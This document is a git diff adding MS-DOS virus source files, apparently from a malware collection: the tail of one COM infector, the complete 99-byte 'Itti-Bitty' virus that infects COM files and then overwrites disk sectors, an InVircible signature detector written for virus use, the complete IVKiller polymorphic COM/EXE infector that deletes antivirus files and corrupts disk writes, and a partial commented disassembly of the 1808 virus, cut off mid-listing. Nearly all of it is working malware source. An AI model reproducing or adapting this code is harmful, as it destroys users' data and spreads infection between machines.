DX points to buffer + int 021h + + cmp word ptr [buffer],0F68Bh ; Are the two bytes "MOV SI,SI" + pushf ; Save flags + je close_it_up ; If not, then file is OK + + cwd ; Zero CX \_ Zero bytes from start + mov cx,dx ; Zero DX / + mov ax,04200h ; DOS file seek function, start + int 021h + + mov ah,040h ; DOS write to file function + mov cx,code_length ; CX holds virus length + mov dx,offset start ; DX points to start of virus + int 021h + +close_it_up: mov si,095h + lodsb + push ax ; Save file's attributes for later + lodsw + xchg cx,ax ; CX holds [096h] + lodsw + xchg dx,ax ; DX holds [098h] + mov ax,05701h ; DOS set file time function + int 021h + + mov ah,03Eh ; DOS close file function + int 021h + + mov ax,04301h ; DOS set file attributes function + pop cx ; CX holds file's old attributes + mov dx,09Eh ; DX points to victim's name + int 021h + + popf ; Restore flags + ret ; Return to caller + +buffer dw ? ; Buffer to hold test data +infect_file endp + + +; Initialized data goes here + +com_spec db "*.COM",0 ; What to infect: all COM files + +fake_error db "EXEC failure",13,10,"$" ; Fake error message + +finish label near + +code ends + end id_bytes \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.itti-b.asm b/MSDOS/Virus.MSDOS.Unknown.itti-b.asm new file mode 100644 index 00000000..8f6886c8 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.itti-b.asm @@ -0,0 +1,96 @@ +; The Itti-Bitty Virus, Strain B +; The smallest virus ever written (only 99 bytes) +; +; (C) 1991 Nowhere Man and [NuKE] WaErZ +; Written by Nowhere Man +; +; + + title "The Itti-Bitty Virus, Strain B: Even smaller" + + code segment 'CODE' + assume cs:code,ds:code,es:code,ss:code + + org 0100h + +code_length equ finish - start + +start label near + +id_bytes proc near + mov si,si ; Serves no purpose: our ID +id_bytes endp + +main proc near + mov ah,04Eh ; DOS find first file function + mov cx,00100111b ; CX holds attribute mask + mov dx,offset com_spec ; DX points to "*.COM" + +file_loop: int 021h + jc go_off ; If there are no files, go off + + call infect_file ; Try to infect found file + jne exit_virus ; Exit if successful + + mov ah,04Fh ; DOS find next file function + jmp short file_loop ; Repeat until out of files + +exit_virus: mov ax,04C01h ; DOS terminate function, code 1 + int 021h +main endp + +go_off proc near + cli ; Prevent all interrupts + + mov ah,2 ; AH holds drive number (C:) + cwd ; Start with sector 0 (boot sector) + mov cx,0100h ; Write 256 sectors (fucks disk) + int 026h ; DOS absolute write interrupt + + jmp $ ; Infinite loop; lock up computer +go_off endp + +infect_file proc near + mov ax,03D02h ; DOS open file function, read-write + mov dx,09Eh ; DX points to the victim + int 021h + + xchg bx,ax ; BX holds file handle + + mov ah,03Fh ; DOS read from file function + mov cx,2 ; CX holds byte to read (2) + mov dx,offset buffer ; DX points to buffer + int 021h + + cmp word ptr [buffer],0F68Bh ; Are the two bytes "MOV SI,SI" + pushf ; Save flags + je close_it_up ; If not, then file is OK + + cwd ; Zero CX \_ Zero bytes from start + mov cx,dx ; Zero DX / + mov ax,04200h ; DOS file seek function, start + int 021h + + mov ah,040h ; DOS write to file function + mov cx,code_length ; CX holds virus length + mov dx,offset start ; DX points to start of virus + int 021h + +close_it_up: mov ah,03Eh ; DOS close file function + int 021h + + popf ; Restore flags + ret ; Return to caller + +buffer dw ? ; Buffer to hold test data +infect_file endp + + +; Initialized data goes here + +com_spec db "*.COM",0 ; What to infect: all COM files + +finish label near + +code ends + end id_bytes \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.ivdetect.asm b/MSDOS/Virus.MSDOS.Unknown.ivdetect.asm new file mode 100644 index 00000000..af9f04ce --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.ivdetect.asm @@ -0,0 +1,143 @@ +; +; InVircible Signature File Scanner for v6.02, (c)1995 ûirogen [NuKE] +; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; Zvi changed his signature files a little in v6.02; although all the +; documentation says that he changed it in v6.01d, I never noticed a change +; until this new version. Anywayz, what he did was simply change his little +; verification word to one that my previous algorithm would think was a false +; positive. Namely 'MZ', 'PK', and 60EAh (which corresponds to EXE headers, +; PKZIP archives, and ARJ archives, respectively). So, since we can't just +; look at the first word of the file, else we'll have many false positives, +; we simply check the next record (42h bytes) for a valid signature. If both +; records contain a valid signature then it's almost definatly an invircible +; signature file. +; +; This utility is an example of how to detect InVircible signature files. +; It skips files larger than 16896 bytes, as it's unlikely that a signature +; file will contain more than 256 different entries and the speed increase +; is definatly of worth in a virus. To use, just run it and it'll scan all +; files in the current directory for InVircible signatures. +; +; + +segment cseg + assume cs: cseg, ds: cseg, es: cseg, ss: cseg + +max_size equ 256*66 ; maximum size of file to scan +lf equ 0ah +cr equ 0dh + +org 100h +start: + lea dx,vanity ; credz.. + call disp + mov ah,1ah + lea dx,ff_info + int 21h ; set DTA + xor bp,bp + xor cx,cx + lea dx,filespec + mov ah,4eh + int 21h ; find first + jnc find_loop + jmp exit +find_loop: + inc bp ; bp is our counter + lea dx,msg1 ; display 'Testing:' + call disp + lea dx,f_name + push dx + call disp ; display file name + mov ax,3d00h ; open file + pop dx + int 21h + jnc no_error + lea dx,error + call disp + jmp not_iv +no_error: + xchg ax,bx ; get handle + xor cx,cx + xor dx,dx + mov ax,4202h + int 21h ; get file size + cmp dx,0 + jnz close + cmp ax,max_size ; file too big? + jae close + xor cx,cx + xor dx,dx + mov ax,4200h + int 21h ; reset file pointer + mov ah,3fh ; read first 44h bytes + mov cx,44h + lea dx,buf + int 21h + cmp ax,44h ; was there only one record? + jz close + mov ax,word ptr buf ; if so simulate second record + mov word ptr buf[42h],ax +close: + mov ah,3eh ; close + int 21h + lea di,buf + call chk_iv + jnz not_iv + lea di,buf[42h] + call chk_iv + jnz not_iv + lea dx,is_iv ; display affirmatice + call disp +not_iv: + mov ah,4fh ; find next + int 21h + jc exit + jmp find_loop + +exit: + cmp bp,0 ; find any files? + jnz some_done + lea dx,no_files ; if not, display a msg + call disp +some_done: + lea dx,done + call disp + ret + +chk_iv: + cmp word ptr [di],0EA60h ; check record + jz yea_iv + cmp word ptr [di],'KP' + jz yea_iv + cmp word ptr [di],'ZM' +yea_iv: + ret + +disp: ; displays null terminated string via + mov cx,0ffh ; DOS + mov di,dx + xor ax,ax + repnz scasb ; search for null + dec di + push di + mov byte ptr [di],'$' ; replace with '$' + mov ah,9 + int 21h + pop di + mov byte ptr [di],0 ; reset null + ret + +vanity db cr,lf,'ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ' + db cr,lf,' InVircible v6.02 Signature File Detector, (c)1995 ûirogen [NuKE]' + db cr,lf,'ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ',cr,lf,0 +msg1 db cr,lf,'Testing File: ',0 +no_files db cr,lf,' No files found!',cr,lf,0 +is_iv db cr,lf,' þ Is an Invircible Signature File!',0 +error db cr,lf,' þ Error Opening! Is this file in the current dir?',0 +done db cr,lf,cr,lf,' Scan Complete.',cr,lf,0 +filespec db '*.*',0 +ff_info db 30 dup(0) +f_name db 13 dup(0) +buf db 44h dup(0) +cseg ends + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.ivkiller.asm b/MSDOS/Virus.MSDOS.Unknown.ivkiller.asm new file mode 100644 index 00000000..a13175a1 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.ivkiller.asm @@ -0,0 +1,479 @@ + +; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ-Ä +; IVKiller - (c)1995 ûirogen - Using ûiCE v0.2á +; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ-Ä +; +; This is yet another virus in what I call my Feb '95 series. Anywayz, this +; virus's main point is that it candelete Invircible signature files. +; Something I haven't seen included with any other viruses. +; +; þ Polymorphic utilizing ViCE v0.2á. JMPS on, Anti-TBSCAN on. +; þ Infects COM and EXE when executed. +; þ COM Infection marker: fourth byte is 0 +; þ EXE infection marker: Checksum in header not equal to 0. +; þ Time/Date do not change +; þ Read-only and hidden files will be infected, and attributes restored. +; þ Virus installs its own critical error handler +; þ Deletes MSAV/CPAV CHecksum filez.. +; þ Deletes Invircible Signature files +; þ Activates on the second of any month, at which time it will phuck +; up all file writes using INT 21h/func 40h. +; + + +cseg segment + assume cs:cseg, ds:cseg, es:cseg, ss:cseg + +signal equ 0FA01h ; AX=signal/INT 21h/installation chk +vsafe_word equ 5945h ; magic word for VSAFE/VWATCH API +special equ 11h +act_day equ 3 +buf_size equ 170 +vice_size equ 1587+buf_size +virus_size equ (offset vend-offset start)+VICE_SIZE +extrn _vice:near + +org 0h +start: + + push ds es + inc si + mov ax,1000h ; looks like legit. INT call.. + add ax,signal-1000h ; are we memory resident? + mov dx,vsafe_word + mov bl,special + int 21h + call nx ; get relative offset + nx: pop bp + sub bp,offset nx + or si,si + jz no_install ; if carry then we are + + call crypt ; decrypt the next few bytez +c_start: + mov cs:activate[bp],0 + mov ah,2ah ; get date + int 21h + cmp dl,act_day ; + jnz no_act + mov cs:activate[bp],1 +no_act: + + mov ax,ds ; PSP segment + dec ax ; mcb below PSP m0n + mov ds,ax ; DS=MCB seg + cmp byte ptr ds: [0],'Z' ; Is this the last MCB in chain? + jnz no_install + sub word ptr ds: [3],((virus_size+1023)/1024)*64*2 ; alloc MCB + sub word ptr ds: [12h],((virus_size+1023)/1024)*64*2 ; alloc PSP + mov es,word ptr ds: [12h] ; get high mem seg + push cs + pop ds + mov si,bp + mov cx,virus_size/2+1 + xor di,di + rep movsw ; copy code to new seg + xor ax,ax + mov ds,ax ; null ds + push ds + lds ax,ds: [21h*4] ; get 21h vector + mov es: word ptr old21+2,ds ; save S:O + mov es: word ptr old21,ax + pop ds + mov ds: [21h*4+2],es ; new int 21h seg + mov ds: [21h*4],offset new21 ; new offset + sub byte ptr ds: [413h],((virus_size+1023)*2)/1024;-totalmem +c_end: +no_install: + + pop es ds ; restore ES DS + cmp cs:is_exe[bp],1 + jz exe_return + + lea si,org_bytes[bp] ; com return + mov di,0100h ; -restore first 4 bytes + mov cx,2 + rep movsw + + mov ax,100h ; jump back to 100h + push ax +_ret:ret + + exe_return: + mov cx,ds ; calc. real CS + add cx,10h + add word ptr cs:[exe_jump+2+bp],cx + int 3 ; fix prefetch + db 0eah +exe_jump dd 0 +is_exe db 0 + +;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; Crypts portion of virus +; +crypt_res: + xor bp,bp +crypt: + lea si,c_start + add si,bp + mov cx,(offset c_end-offset c_start) + add byte ptr cs:xor_op[bp],10h ; self modifying code... + int 3 ; fix prefetch +l1: + db 2Eh +xor_op db 70h,34h ; tbscan won't flag this bitch +xor_val db 0 + inc si + loop l1 + sub byte ptr cs:xor_op[bp],10h ; unmodify code + ret + +;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; Infection routine - called from INT 21h handler. +; DS:DX=fname +; + +infect_file: + + int 3 + push dx + pop si + + push ds + xor ax,ax ; null ES + mov es,ax + lds ax,es:[24h*4] ; get INT 24h vector + mov cs:old_24_off,ax ; save it + mov cs:old_24_seg,ds + mov es:[24h*4+2],cs ; install our handler + mov es:[24h*4],offset new_24 + pop ds + push es ; we'll need it later + push cs + pop es + + mov ax,4300h ; get phile attribute + int 21h + mov ax,4301h ; null attribs + push ax cx ; save AX-call/CX-attrib + xor cx,cx + int 21h + + mov ax,3d02h ; open the file + int 21h + jc dont_do + + mov bx,ax ; get handle + + push cs + pop ds + + call kill_chklst ; kill MSAV and CPAV checksum files + call kill_iv ; kill Invircible Signature Files + + mov ah,3fh ; Read first bytes of file + mov cx,20h + lea dx,org_bytes + int 21h + + cmp byte ptr org_bytes,'M' ; single byte avoids heuristic flag + jz do_exe + cmp byte ptr org_bytes+3,0 + jz close + + mov is_exe,0 + + mov ax,5700h ; get time/date + int 21h + push cx dx + + call offset_end + push ax ; AX=end of file + + lea si,start ; DS:SI=start of code to encrypt + mov di,virus_size ; ES:DI=address for decryptor/ + push di ; encrypted code. (at heap) + mov cx,virus_size ; CX=virus size + mov dx,ax ; DX=EOF offset + add dx,100h ; DX=offset decryptor will run from + mov al,00001111b ; jmps,anti-tbscan, garbage, no CS: + call _vice ; call engine! + + pop dx + mov ah,40h + int 21h + + call offset_zero + pop ax ; restore COM file size + sub ax,3 ; calculate jmp offset + mov word ptr new_jmp+1,ax + + lea dx,new_jmp + mov cx,4 + mov ah,40h + int 21h + + pop dx cx ; pop date/time + mov ax,5701h ; restore the mother fuckers + int 21h + + close: + + pop cx ax ; restore attrib + int 21h + + call close_phile + + dont_do: + pop es ; ES=0 + lds ax,dword ptr old_24_off ; restore shitty DOS error handler + mov es:[24h*4],ax + mov es:[24h*4+2],ds + + ret + + do_exe: + + cmp word ptr exe_header[12h],0 ; is checksum (in hdr) 0? + jnz close + cmp byte ptr exe_header[18h],52h ; pklite'd? + jz exe_ok + cmp byte ptr exe_header[18h],40h ; don't infect new format exe + jge close +exe_ok: + push bx + + mov ah,2ch ; grab a random number + int 21h + mov word ptr exe_header[12h],dx ; mark that it's us + mov is_exe,1 + + les ax,dword ptr exe_header+14h ; Save old entry point + mov word ptr ds:exe_jump, ax + mov word ptr ds:exe_jump+2, es + + push cs + pop es + + call offset_end + + push dx ax ; save file size DX:AX + + mov bx, word ptr exe_header+8h ; calc. new entry point + mov cl,4 ; *16 + shl bx,cl ; ^by shifting one byte + sub ax,bx ; get actual file size-header + sbb dx,0 + mov cx,10h ; divide AX/CX rDX + div cx + + mov word ptr exe_header+14h,dx + mov word ptr exe_header+16h,ax + mov rel_off,dx + + pop ax ; AX:DX file size + pop dx + pop bx + + mov cx,virus_size+10h ; calc. new size + adc ax,cx + + mov cl,9 ; calc new alloc (512) + push ax + shr ax,cl + ror dx,cl + stc + adc dx,ax + pop ax ; ax=size+virus + and ah,1 + + mov word ptr exe_header+4h,dx + mov word ptr exe_header+2h,ax + + lea si,start ; DS:SI=start of code to encrypt + mov di,virus_size ; ES:DI=address for decryptor and + push di ; encrypted code (at heap) + mov cx,virus_size ; CX=virus size + mov dx,rel_off ; DX=offset decryptor will run from + mov al,00001110b ; jmps,anti-tbscan,garbage, use CS: + call _vice ; call engine! + + pop dx + mov ah,40h + int 21h + + call offset_zero + + mov cx,18h ; write fiXed header + lea dx,exe_header + mov ah,40h + int 21h + + jmp close + +;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; set file ptr + +offset_zero: ; self explanitory + xor al,al + jmp set_fp +offset_end: + mov al,02h + set_fp: + mov ah,42h + xor cx,cx + xor dx,dx + int 21h + ret + +;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; close file +; +close_phile: + mov ah,3eh + int 21h + ret + +;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; Kill those darned MSAV and CPAV filez.. +; +kill_chklst: + mov di,2 ; counter for loop + lea dx,first_2die ; first fname to kill +kill_loop: + call delete_phile + lea dx,last_2die ; second fname to kill + dec di + jnz kill_loop + + ret +first_2die db 'CHKLIST.MS',0 ; MSAV shitty checksum +last_2die db 'CHKLIST.CPS',0 ; CPAV shitty checksum + +;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; Resets attribs then deletes phile -> DS:DX +; +delete_phile: + + mov ax,4301h ; reset attribs + xor cx,cx + int 21h + mov ah,41h + int 21h + ret +;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; Set DTA +; + set_dta: + mov ah,1ah + int 21h + ret + +;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; Kill Invircible Signature Files +; +kill_iv: + push bx + lea dx,ff_info + call set_dta + lea dx,filespec + xor cx,cx + mov ah,4eh + int 21h ; find first + jc done_with_iv +find_loop: + lea dx,ff_name + mov ax,3d00h ; open file + int 21h + jc not_iv ; if error opening then skip + xchg ax,bx ; get handle + mov ah,3fh ; read first word + mov cx,2 + lea dx,killiv_buf + int 21h + call close_phile + mov ax,word ptr killiv_buf + cmp ax,0FEA1h ; is iv? + jz yea_iv + cmp ax,0C307h ; is iv? + jz yea_iv + cmp ax,086BBh ; is iv? + jnz not_iv +yea_iv: + lea dx,ff_name + call delete_phile ; delete the phucker +not_iv: + mov ah,4fh ; find next + int 21h + jnc find_loop +done_with_iv: + pop bx + ret + +killiv_buf dw 0 +filespec db '*.*',0 +ff_info db 30 dup (0) +ff_name db 13 dup (0) + + +;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; new 21h + +new21: + + pushf + cmp ax,signal ; be it us? + jnz not_us ; richtig.. + cmp dx,vsafe_word + jnz not_us + cmp bl,special + jnz not_us + xor si,si + mov di,4559h + jmp jmp_org +not_us: + cmp cs:activate,0 ; time to activate? + jz nchk + cmp ah,40h ; write to phile? + jnz jmp_org + xor dx,dx ; phuck up address.. +nchk: cmp ax,4b00h ; execute phile? + jnz jmp_org + + push ax bx cx di dx si ds es bp dx + mov ah,2ch ; grab random for cryptor + int 21h + mov byte ptr cs:xor_val,dl + pop dx + call crypt_res + call infect_file + call crypt_res + pop bp es ds si dx di cx bx ax + + jmp_org: + popf + db 0eah ; jump far XXXX:XXXX + old21 dd 0 + + +new_24: ; critical error handler + mov al,3 ; prompts suck, return fail + iret + + +activate db 0 +txt_ptr dw offset credits +credits db '[IvKiller, by ûirogen]' +credit_end: +new_jmp db 0E9h,0,0,0 ; jmp XXXX,0 +rel_off dw 0 +exe_header: +org_bytes db 0CDh,20h,0,0 ; original COM bytes | exe hdr +heap: +db 16h dup(0) ; remaining exe header space +old_24_off dw 0 ; old int24h vector +old_24_seg dw 0 +vend: +cseg ends + end start + diff --git a/MSDOS/Virus.MSDOS.Unknown.j_1808.asm b/MSDOS/Virus.MSDOS.Unknown.j_1808.asm new file mode 100644 index 00000000..38366950 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.j_1808.asm @@ -0,0 +1,583 @@ +;======================================================================= +; VIRUS 1808 +; Virus se napojuje na preruseni 08 (hodiny) a zpomaluje chod pocitace. +; +; +; +45AD:0100 E99200 JMP 0195 +0100 E9 92 00 73 55 4D 73 44-6F 73 00 01 77 14 00 00 i..sUMsDos..w... +0110 00 00 01 2C 02 70 00 1C-02 BC 0F EB 04 FE 0D C6 ...,.p...<.k.~.F +0120 5D 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ]............... +0130 00 F2 13 80 00 00 00 80-00 F2 13 5C 00 F2 13 6C .r.......r.\.r.l +0140 00 F2 13 10 07 82 2A C5-00 82 2A 00 F0 06 00 4D .r....*E..*.p..M +0150 5A 40 00 5D 01 00 00 20-00 2F 02 FF FF F3 2A 10 Z@.]... ./...s*. +0160 07 84 19 C5 00 F3 2A 1E-00 00 00 00 00 00 00 00 ...E.s*......... +0170 05 00 20 00 94 09 B0 B1-00 02 10 00 30 B1 02 00 .. ...01....01.. + +45AD:0195 FC CLD +45AD:0196 B4E0 MOV AH,E0 ;================================ +45AD:0198 CD21 INT 21 ; Test pritomnosti v pamati. +45AD:019A 80FCE0 CMP AH,E0 ; +45AD:019D 7316 JNB 01B5 +45AD:019F 80FC03 CMP AH,03 +45AD:01A2 7211 JB 01B5 +45AD:01A4 B4DD MOV AH,DD +45AD:01A6 BF0001 MOV DI,0100 +45AD:01A9 BE1007 MOV SI,0710 +45AD:01AC 03F7 ADD SI,DI +45AD:01AE 2E8B8D1100 MOV CX,CS:[DI+0011] +45AD:01B3 CD21 INT 21 +45AD:01B5 8CC8 MOV AX,CS +45AD:01B7 051000 ADD AX,0010 +45AD:01BA 8ED0 MOV SS,AX +45AD:01BC BC0007 MOV SP,0700 +45AD:01BF 50 PUSH AX +45AD:01C0 B8C500 MOV AX,00C5 +45AD:01C3 50 PUSH AX +45AD:01C4 CB RETF ; Jdeme na nasledujici radek. +;========================================================================= +45BD:00C5 FC CLD ; +45BD:00C6 06 PUSH ES +45BD:00C7 2E8C063100 MOV CS:[0031],ES +45BD:00CC 2E8C063900 MOV CS:[0039],ES +45BD:00D1 2E8C063D00 MOV CS:[003D],ES +45BD:00D6 2E8C064100 MOV CS:[0041],ES +45BD:00DB 8CC0 MOV AX,ES +45BD:00DD 051000 ADD AX,0010 +45BD:00E0 2E01064900 ADD CS:[0049],AX +45BD:00E5 2E01064500 ADD CS:[0045],AX +45BD:00EA B4E0 MOV AH,E0 ;========================= +45BD:00EC CD21 INT 21 ; +45BD:00EE 80FCE0 CMP AH,E0 ; +45BD:00F1 7313 JNB 0106 ;========================= +45BD:00F3 80FC03 CMP AH,03 ; VIRUS JE INSTALOVAN. +45BD:00F6 07 POP ES +45BD:00F7 2E8E164500 MOV SS,CS:[0045] +45BD:00FC 2E8B264300 MOV SP,CS:[0043] +45BD:0101 2EFF2E4700 JMP FAR CS:[0047] +45BD:0106 33C0 XOR AX,AX ;========================= +45BD:0108 8EC0 MOV ES,AX ; VIRUS NENI INSTALOVAN. +45BD:010A 26A1FC03 MOV AX,ES:[03FC] ; Prerusovaci vektor 255. +45BD:010E 2EA34B00 MOV CS:[004B],AX ; Je definovan kod +45BD:0112 26A0FE03 MOV AL,ES:[03FE] ; 0000:03FC F3 REPZ +45BD:0116 2EA24D00 MOV CS:[004D],AL 0000:03FD A5 MOVSW +45BD:011A 26C706FC03F3A5 MOV Word Ptr ES:[03FC],A5F3 0000:03FE CB RETF +45BD:0121 26C606FE03CB MOV Byte Ptr ES:[03FE],CB +45BD:0127 58 POP AX +45BD:0128 051000 ADD AX,0010 +45BD:012B 8EC0 MOV ES,AX +45BD:012D 0E PUSH CS +45BD:012E 1F POP DS +45BD:012F B91007 MOV CX,0710 +45BD:0132 D1E9 SHR CX,1 +45BD:0134 33F6 XOR SI,SI +45BD:0136 8BFE MOV DI,SI +45BD:0138 06 PUSH ES +45BD:0139 B84201 MOV AX,0142 +45BD:013C 50 PUSH AX +45BD:013D EAFC030000 JMP 0000:03FC ;======================== +45BD:0142 8CC8 MOV AX,CS ; Po skoku pokracujeme +45BD:0144 8ED0 MOV SS,AX ; na 45BD:142 +45BD:0146 BC0007 MOV SP,0700 +45BD:0149 33C0 XOR AX,AX ;======================== +45BD:014B 8ED8 MOV DS,AX ; +45BD:014D 2EA14B00 MOV AX,CS:[004B] ; Obnoveni puvodni hodno- +45BD:0151 A3FC03 MOV [03FC],AX ; ty preruseni 255. +45BD:0154 2EA04D00 MOV AL,CS:[004D] +45BD:0158 A2FE03 MOV [03FE],AL +45BD:015B 8BDC MOV BX,SP ; Velikost programu v +45BD:015D B104 MOV CL,04 ; paragrafech. +45BD:015F D3EB SHR BX,CL +45BD:0161 83C310 ADD BX,+10 +45BD:0164 2E891E3300 MOV CS:[0033],BX ; Zmen velikost alokovane +45BD:0169 B44A MOV AH,4A ; pameti. +45BD:016B 2E8E063100 MOV ES,CS:[0031] ; +45BD:0170 CD21 INT 21 ;======================== +45BD:0172 B82135 MOV AX,3521 ; Cti preruseni 21H. +45BD:0175 CD21 INT 21 ; +45BD:0177 2E891E1700 MOV CS:[0017],BX ; +45BD:017C 2E8C061900 MOV CS:[0019],ES ;======================== +45BD:0181 0E PUSH CS +45BD:0182 1F POP DS +45BD:0183 BA5B02 MOV DX,025B ; Definice noveho vektoru +45BD:0186 B82125 MOV AX,2521 ; preruseni 21H. +45BD:0189 CD21 INT 21 ;======================== +45BD:018B 8E063100 MOV ES,[0031] +45BD:018F 268E062C00 MOV ES,ES:[002C] +45BD:0194 33FF XOR DI,DI +45BD:0196 B9FF7F MOV CX,7FFF +45BD:0199 32C0 XOR AL,AL +45BD:019B F2 REPNZ +45BD:019C AE SCASB +45BD:019D 263805 CMP ES:[DI],AL +45BD:01A0 E0F9 LOOPNZ 019B +45BD:01A2 8BD7 MOV DX,DI +45BD:01A4 83C203 ADD DX,+03 +45BD:01A7 B8004B MOV AX,4B00 +45BD:01AA 06 PUSH ES +45BD:01AB 1F POP DS +45BD:01AC 0E PUSH CS +45BD:01AD 07 POP ES +45BD:01AE BB3500 MOV BX,0035 +45BD:01B1 1E PUSH DS +45BD:01B2 06 PUSH ES +45BD:01B3 50 PUSH AX +45BD:01B4 53 PUSH BX +45BD:01B5 51 PUSH CX +45BD:01B6 52 PUSH DX +45BD:01B7 B42A MOV AH,2A ; DATUM +45BD:01B9 CD21 INT 21 ;====================== +45BD:01BB 2EC6060E0000 MOV Byte Ptr CS:[000E],00 +45BD:01C1 81F9C307 CMP CX,07C3 ; Virus se nemnozi roku +45BD:01C5 7430 JZ 01F7 ; 1987, v patek 13 maze +45BD:01C7 3C05 CMP AL,05 ; spustene soubory. +45BD:01C9 750D JNZ 01D8 +45BD:01CB 80FA0D CMP DL,0D +45BD:01CE 7508 JNZ 01D8 +45BD:01D0 2EFE060E00 INC Byte Ptr CS:[000E] +45BD:01D5 EB20 JMP 01F7 +45BD:01D7 90 NOP +45BD:01D8 B80835 MOV AX,3508 ;======================= +45BD:01DB CD21 INT 21 ; Redefinice preruseni +45BD:01DD 2E891E1300 MOV CS:[0013],BX ; 08. +45BD:01E2 2E8C061500 MOV CS:[0015],ES +45BD:01E7 0E PUSH CS +45BD:01E8 1F POP DS +45BD:01E9 C7061F00907E MOV Word Ptr [001F],7E90 +45BD:01EF B80825 MOV AX,2508 +45BD:01F2 BA1E02 MOV DX,021E ; +45BD:01F5 CD21 INT 21 ;======================= +45BD:01F7 5A POP DX +45BD:01F8 59 POP CX +45BD:01F9 5B POP BX +45BD:01FA 58 POP AX +45BD:01FB 07 POP ES +45BD:01FC 1F POP DS +45BD:01FD 9C PUSHF +45BD:01FE 2EFF1E1700 CALL FAR CS:[0017] ; LOAD AND EXECUTE. +45BD:0203 1E PUSH DS ; +45BD:0204 07 POP ES +45BD:0205 B449 MOV AH,49 +45BD:0207 CD21 INT 21 +45BD:0209 B44D MOV AH,4D +45BD:020B CD21 INT 21 +45BD:020D B431 MOV AH,31 +45BD:020F BA0006 MOV DX,0600 +45BD:0212 B104 MOV CL,04 +45BD:0214 D3EA SHR DX,CL +45BD:0216 83C210 ADD DX,+10 +45BD:0219 CD21 INT 21 +45BD:021B 32C0 XOR AL,AL +45BD:021D CF IRET +; +;======================================================================= +; OBSLUHA PRERUSENI 08. +; +45BD:021E 2E833E1F0002 CMP Word Ptr CS:[001F],+02 +45BD:0224 7517 JNZ 023D +45BD:0226 50 PUSH AX +45BD:0227 53 PUSH BX +45BD:0228 51 PUSH CX +45BD:0229 52 PUSH DX +45BD:022A 55 PUSH BP +45BD:022B B80206 MOV AX,0602 +45BD:022E B787 MOV BH,87 +45BD:0230 B90505 MOV CX,0505 +45BD:0233 BA1010 MOV DX,1010 +45BD:0236 CD10 INT 10 +45BD:0238 5D POP BP +45BD:0239 5A POP DX +45BD:023A 59 POP CX +45BD:023B 5B POP BX +45BD:023C 58 POP AX +45BD:023D 2EFF0E1F00 DEC Word Ptr CS:[001F] +45BD:0242 7512 JNZ 0256 +45BD:0244 2EC7061F000100 MOV Word Ptr CS:[001F],0001 +45BD:024B 50 PUSH AX +45BD:024C 51 PUSH CX +45BD:024D 56 PUSH SI +45BD:024E B90140 MOV CX,4001 +45BD:0251 F3 REPZ +45BD:0252 AC LODSB +45BD:0253 5E POP SI +45BD:0254 59 POP CX +45BD:0255 58 POP AX +45BD:0256 2EFF2E1300 JMP FAR CS:[0013] +; +;======================================================================= +; OBSLUHA PRERUSENI 21H. +; +45BD:025B 9C PUSHF +45BD:025C 80FCE0 